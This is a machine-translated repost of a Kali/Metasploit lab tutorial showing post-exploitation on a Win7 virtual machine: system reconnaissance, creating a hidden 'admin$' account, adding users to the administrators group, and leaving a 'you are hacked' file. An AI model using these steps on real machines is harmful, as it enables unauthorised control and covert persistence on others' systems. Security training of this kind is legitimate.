当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! [maintain]
Network security engineer Demo: the original * * is to get your computer administrator rights! [maintain]
2020-11-06 01:35:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. It's a success Win7 One virtual machine
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 Yes, it's taken down Windows After the host enters *** Stage , The specific operation is shown in the figure below .
step 1: Run the exploit module , As shown in the figure below .
command :run
step 2: Get into Windows The host cmd window , As shown in the figure below .
step 3: Use the command to view the system information of the victim host , Know yourself and know your enemy, and have a more comprehensive grasp of the target victim host , More comprehensive control of the target host , Get more comprehensive information , As shown in the figure below .
command :systeminfo
step 4: The system information of the victim host is shown in the figure below .
3.2 User management operation on the victim host , As shown in the figure below .
step 1: Add hidden user information to the victim host , As shown in the figure below .
command :net user A new user name $ User password /add
Example :net user admin$ 12456 /add
step 2: Check out the new users you just added , As shown in the figure below .
command :net user( Because the new user is a hidden user , So the command line can't see the user )
step 3: Add new users that are not hidden , As shown in the figure below .
command :net user A new user name User password /add
Example :net user admin 12456 /add
step 4: Check out the new users you just added , As shown in the figure below .
command :net user
step 5: Use the graphical interface in the victim host to view the newly created user , You can see the new hidden user in this interface ( If you need to achieve the real sense of hidden users, you need to change the registry , Please keep an eye on the follow-up of this issue )
step 6: Delete user , As shown in the figure below .
command :net user user name /del
Example :net user admin /del
step 7: Add the new user to the administrators group , As shown in the figure below .
command :net localgroup administrators /add
step 8: View the users of the administrators group , As shown in the figure below .
command :net localgroup administrators
3.3 File operation on the victim host , As shown in the figure below .
step 1: New folder
command :md file name
Example :md abc
step 2: Delete folder
command :rd file name
Example :rd abc
step 3: New text file , As shown in the figure below .
command :echo Text file content > file name
Example :echo hi you are hacked > hk.txt
3.4 Check the host name of the victim host , As shown in the figure below .
command :hostname
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills ! Please add a link description
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- Summary of common string algorithms
- 前端基础牢记的一些操作-Github仓库管理
- 一篇文章带你了解CSS对齐方式
- Five vuex plug-ins for your next vuejs project
- 01. SSH Remote terminal and websocket of go language
- [event center azure event hub] interpretation of error information found in event hub logs
- axios学习笔记(二):轻松弄懂XHR的使用及如何封装简易axios
- The dynamic thread pool in Kitty supports Nacos and Apollo multi configuration centers
- Python基础变量类型——List浅析
- Filecoin主网上线以来Filecoin矿机扇区密封到底是什么意思
猜你喜欢
The difference between gbdt and XGB, and the mathematical derivation of gradient descent method and Newton method
Summary of common string algorithms
I'm afraid that the spread sequence calculation of arbitrage strategy is not as simple as you think
Face to face Manual Chapter 16: explanation and implementation of fair lock of code peasant association lock and reentrantlock
Python filtering sensitive word records
Jetcache buried some of the operation, you can't accept it
这个项目可以让你在几分钟快速了解某个编程语言
ES6学习笔记(四):教你轻松搞懂ES6的新增语法
Summary of common algorithms of linked list
Music generation through deep neural network
随机推荐
After reading this article, I understand a lot of webpack scaffolding
只有1个字节的文件实际占用多少磁盘空间
6.1.1 handlermapping mapping processor (1) (in-depth analysis of SSM and project practice)
Word segmentation, naming subject recognition, part of speech and grammatical analysis in natural language processing
It is really necessary to build a distributed ID generation service
How to use parameters in ES6
Wechat applet: prevent multiple click jump (function throttling)
一篇文章带你了解CSS 分页实例
Analysis of react high order components
What to do if you are squeezed by old programmers? I don't want to quit
(1) ASP.NET Introduction to core3.1 Ocelot
Vue.js Mobile end left slide delete component
Wow, elasticsearch multi field weight sorting can play like this
Just now, I popularized two unique skills of login to Xuemei
Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
ES6 essence:
Five vuex plug-ins for your next vuejs project
What is the side effect free method? How to name it? - Mario
The data of pandas was scrambled and the training machine and testing machine set were selected
有了这个神器,快速告别垃圾短信邮件